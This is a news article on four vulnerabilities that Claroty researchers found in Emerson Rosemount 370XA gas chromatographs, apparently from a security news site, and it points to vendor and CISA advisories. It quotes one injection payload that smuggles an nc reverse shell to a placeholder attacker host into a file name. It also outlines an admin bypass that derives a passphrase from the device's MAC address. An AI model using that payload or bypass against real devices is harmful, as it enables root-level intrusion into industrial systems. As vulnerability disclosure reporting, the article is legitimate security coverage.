Multiple Vulnerabilities Found in Gas Chromatographs – Source: www.databreachtoday.com

Endpoint Security
,
Governance & Risk Management
,
Internet of Things Security

Critical-Severity Flaws Expose Emerson Devices to Cyberattacks

Prajeet Nair (@prajeetspeaks) •
June 28, 2024    

Multiple critical vulnerabilities in Emerson gas chromatographs could allow malicious actors access to sensitive data, cause denial-of-service conditions and execute arbitrary commands.

See Also: SASE: Recognizing the Challenges of Securing a Hybrid Workforce

Gas chromatographs, used to analyze and separate chemical compounds, are integral tools in several industries, including the chemical, environmental and healthcare sectors. The Emerson Rosemount 370XA, a widely used model, relies on a proprietary protocol for communication between the device and the technician’s computer.

Security researchers at operational technology security firm Claroty’s Team82 identified four key vulnerabilities: two command injection flaws, an authentication bypass and an authorization vulnerability. One command injection flaw received a CVSS v3 score of 9.8, indicating its critical severity.

The vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection vulnerability found in the implementation of the “forced calibration” command type. The vulnerability is linked to a system function that is called with a constructed shell command and includes a user-provided file name, without proper sanitization. This enables an attacker to inject arbitrary shell commands.

The attacker can exploit this by supplying a crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, which results in arbitrary code execution in the context of the root shell.

Another vulnerability, tracked as CVE-2023-51761, is an authentication bypass vulnerability that allows an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password.

The passphrase is derived from the device’s MAC address, which is not secret information and can be easily obtained. By understanding the passphrase validation procedure, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

The vulnerability tracked as CVE-2023-49716 is a user login bypass via a password reset mechanism. This vulnerability enables an unauthenticated user with network access to bypass authentication and acquire admin capabilities.

The last vulnerability addressed is tracked as CVE-2023-43609 and is a command injection via reboot functionality. This flaw allows an authenticated user with network access to run arbitrary commands from a remote computer.

Because of the high cost and difficulty of obtaining a physical device, the researchers emulated the Emerson Rosemount 370XA for their analysis. They identified flaws in the device’s protocol implementation, allowing them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for instance, enabled attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

Emerson in a security advisory recommended that end users update the firmware on the products. The Cybersecurity and Infrastructure Security Agency has also released an advisory concerning the flaws.